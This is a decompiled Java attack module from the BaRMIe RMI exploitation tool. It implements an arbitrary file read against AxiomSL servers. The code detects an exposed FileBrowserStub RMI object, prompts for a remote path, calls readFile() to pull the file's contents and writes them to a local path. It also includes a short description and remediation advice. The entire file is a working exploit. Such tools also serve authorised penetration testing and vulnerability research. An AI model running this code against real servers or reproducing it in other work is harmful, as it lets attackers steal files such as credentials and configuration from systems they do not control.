/*
 * Decompiled with CFR 0.152.
 */
package nb.barmie.modes.attack.attacks.Axiom;

import axiomsl.server.rmi.FileBrowserStub;
import axiomsl.server.rmi.FileInformation;
import nb.barmie.exceptions.BaRMIeException;
import nb.barmie.exceptions.BaRMIeRemoteMethodCallException;
import nb.barmie.modes.attack.RMIAttack;
import nb.barmie.modes.enumeration.RMIEndpoint;

public class ReadFile
extends RMIAttack {
    public ReadFile() {
        this.setDescription("AxiomSL arbitrary file read");
        this.setDetailedDescription("AxiomSL exposes an object FileBrowserStub, which has a readFile() method that returns the contents of the file at the given path.");
        this.setRemediationAdvice("[AxiomSL] Update AxiomSL to the latest available version.");
    }

    @Override
    public boolean canAttackEndpoint(RMIEndpoint ep) {
        return ep.hasClass("axiomsl.server.rmi.FileBrowserStub");
    }

    @Override
    public void executeAttack(RMIEndpoint ep) throws BaRMIeException {
        String srcFilename = this.promptUserForInput("Enter a filename to read: ", false);
        String dstFilename = this.promptUserForInput("Enter a path to save the file to: ", false);
        System.out.println("");
        System.out.println("[~] Getting fileBrowser object...");
        FileBrowserStub fbs = (FileBrowserStub)this.getRemoteObject(ep, "fileBrowser");
        try {
            System.out.println("[+] Retrieved, getting file information...");
            FileInformation fi = fbs.getFileInformation(srcFilename);
            if (fi.bExists && fi.lSize > 0L) {
                System.out.println("[+] File exists, size: " + fi.lSize);
                byte[] contents = fbs.readFile(srcFilename, 0L, (int)fi.lSize);
                if (contents != null) {
                    System.out.println("[+] File retrieved, writing local file...");
                    this.writeFile(dstFilename, contents);
                } else {
                    System.out.println("[-] No data returned");
                }
            } else {
                System.out.println("[-] The file does not exist on the server.");
            }
        }
        catch (Exception re) {
            throw new BaRMIeRemoteMethodCallException("Failed to read the remote file.", re);
        }
        if (this.fileExists(dstFilename)) {
            System.out.println("[+] Requested file has been downloaded.");
        } else {
            System.out.println("[-] Something went wrong whilst attempting to download the file.");
        }
    }
}

